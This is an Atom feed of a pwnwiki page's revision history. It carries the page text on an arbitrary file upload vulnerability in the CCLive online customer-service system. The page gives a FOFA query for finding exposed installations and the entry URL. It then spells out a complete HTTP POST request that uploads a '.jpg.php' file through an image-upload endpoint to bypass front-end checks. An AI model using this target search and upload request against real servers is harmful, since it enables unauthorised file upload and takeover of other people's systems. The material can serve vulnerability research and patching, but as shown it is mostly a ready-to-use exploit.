<?xml version="1.0"?>
<feed xmlns="http://www.w3.org/2005/Atom" xml:lang="chinese">
	<id>https://pwnwiki.com/index.php?action=history&amp;feed=atom&amp;title=CCLive%E5%9C%A8%E7%B7%9A%E5%AE%A2%E6%9C%8D_%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E4%B8%8A%E5%82%B3%E6%BC%8F%E6%B4%9E</id>
	<title>CCLive在線客服 任意文件上傳漏洞 - Revision history</title>
	<link rel="self" type="application/atom+xml" href="https://pwnwiki.com/index.php?action=history&amp;feed=atom&amp;title=CCLive%E5%9C%A8%E7%B7%9A%E5%AE%A2%E6%9C%8D_%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E4%B8%8A%E5%82%B3%E6%BC%8F%E6%B4%9E"/>
	<link rel="alternate" type="text/html" href="https://pwnwiki.com/index.php?title=CCLive%E5%9C%A8%E7%B7%9A%E5%AE%A2%E6%9C%8D_%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E4%B8%8A%E5%82%B3%E6%BC%8F%E6%B4%9E&amp;action=history"/>
	<updated>2026-04-26T15:30:36Z</updated>
	<subtitle>Revision history for this page on the wiki</subtitle>
	<generator>MediaWiki 1.35.1</generator>
	<entry>
		<id>https://pwnwiki.com/index.php?title=CCLive%E5%9C%A8%E7%B7%9A%E5%AE%A2%E6%9C%8D_%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E4%B8%8A%E5%82%B3%E6%BC%8F%E6%B4%9E&amp;diff=3592&amp;oldid=prev</id>
		<title>Pwnwiki: Created page with &quot;==FOFA== &lt;pre&gt; title=&quot;CCLive在线客服系统&quot; &lt;/pre&gt;  ==漏洞利用== 訪問URL進入在線客服頁面，然後從圖片上傳處進行抓包 &lt;pre&gt; /index/index/home?visit...&quot;</title>
		<link rel="alternate" type="text/html" href="https://pwnwiki.com/index.php?title=CCLive%E5%9C%A8%E7%B7%9A%E5%AE%A2%E6%9C%8D_%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E4%B8%8A%E5%82%B3%E6%BC%8F%E6%B4%9E&amp;diff=3592&amp;oldid=prev"/>
		<updated>2021-05-27T07:06:05Z</updated>

		<summary type="html">&lt;p&gt;Created page with &amp;quot;==FOFA== &amp;lt;pre&amp;gt; title=&amp;quot;CCLive在线客服系统&amp;quot; &amp;lt;/pre&amp;gt;  ==漏洞利用== 訪問URL進入在線客服頁面，然後從圖片上傳處進行抓包 &amp;lt;pre&amp;gt; /index/index/home?visit...&amp;quot;&lt;/p&gt;
&lt;p&gt;&lt;b&gt;New page&lt;/b&gt;&lt;/p&gt;&lt;div&gt;==FOFA==&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
title=&amp;quot;CCLive在线客服系统&amp;quot;&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==漏洞利用==&lt;br /&gt;
訪問URL進入在線客服頁面，然後從圖片上傳處進行抓包&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
/index/index/home?visiter_id=&amp;amp;visiter_name=&amp;amp;avatar=&amp;amp;business_id=1&amp;amp;groupid=0&amp;amp;special=1 &lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
將png後綴修改為php,以這樣的方式來繞過前端驗證:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
POST /admin/event/uploadimg HTTP/1.1&lt;br /&gt;
Host: url&lt;br /&gt;
Cookie: PHPSESSID=utrvj3a4vmncvmiaknccmt17nr&lt;br /&gt;
Content-Length: 721&lt;br /&gt;
Accept: application/json, text/javascript, */*; q=0.01&lt;br /&gt;
Origin: url&lt;br /&gt;
X-Requested-With: XMLHttpRequest&lt;br /&gt;
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 SE 2.X MetaSr 1.0&lt;br /&gt;
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryWvBQTUlpjNAdVfUt&lt;br /&gt;
Referer: url/index/index?code=v9zzfNPShXGiImqm%2BjTb52DPR%2B%2BcnjEIFN4Q%2BfnbLgkNxmOgGDfmOzNSL49%2B0SCZHhjvyJZc%2BNPFyOv33HNisSF5hkaZW0w4QFZkqCzXmWx9Bi0GXxAdBo0MVIuqTye2XlFYUQ&lt;br /&gt;
Accept-Encoding: gzip, deflate&lt;br /&gt;
Accept-Language: zh-CN,zh;q=0.8&lt;br /&gt;
Connection: close&lt;br /&gt;
------WebKitFormBoundaryWvBQTUlpjNAdVfUt&lt;br /&gt;
Content-Disposition: form-data; name=&amp;quot;editormd-image-file&amp;quot;; filename=&amp;quot;1.jpg.php&amp;quot;&lt;br /&gt;
Content-Type: image/png&lt;br /&gt;
text&lt;br /&gt;
------WebKitFormBoundaryWvBQTUlpjNAdVfUt&lt;br /&gt;
Content-Disposition: form-data; name=&amp;quot;visiter_id&amp;quot;&lt;br /&gt;
YKs5EmtR&lt;br /&gt;
------WebKitFormBoundaryWvBQTUlpjNAdVfUt&lt;br /&gt;
Content-Disposition: form-data; name=&amp;quot;business_id&amp;quot;&lt;br /&gt;
zzcc520&lt;br /&gt;
------WebKitFormBoundaryWvBQTUlpjNAdVfUt&lt;br /&gt;
Content-Disposition: form-data; name=&amp;quot;avatar&amp;quot;&lt;br /&gt;
/assets/images/index/avatar-red2.png&lt;br /&gt;
------WebKitFormBoundaryWvBQTUlpjNAdVfUt&lt;br /&gt;
Content-Disposition: form-data; name=&amp;quot;record&amp;quot;&lt;br /&gt;
------WebKitFormBoundaryWvBQTUlpjNAdVfUt&lt;br /&gt;
Content-Disposition: form-data; name=&amp;quot;service_id&amp;quot;&lt;br /&gt;
13&lt;br /&gt;
------WebKitFormBoundaryWvBQTUlpjNAdVfUt--&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;/div&gt;</summary>
		<author><name>Pwnwiki</name></author>
	</entry>
</feed>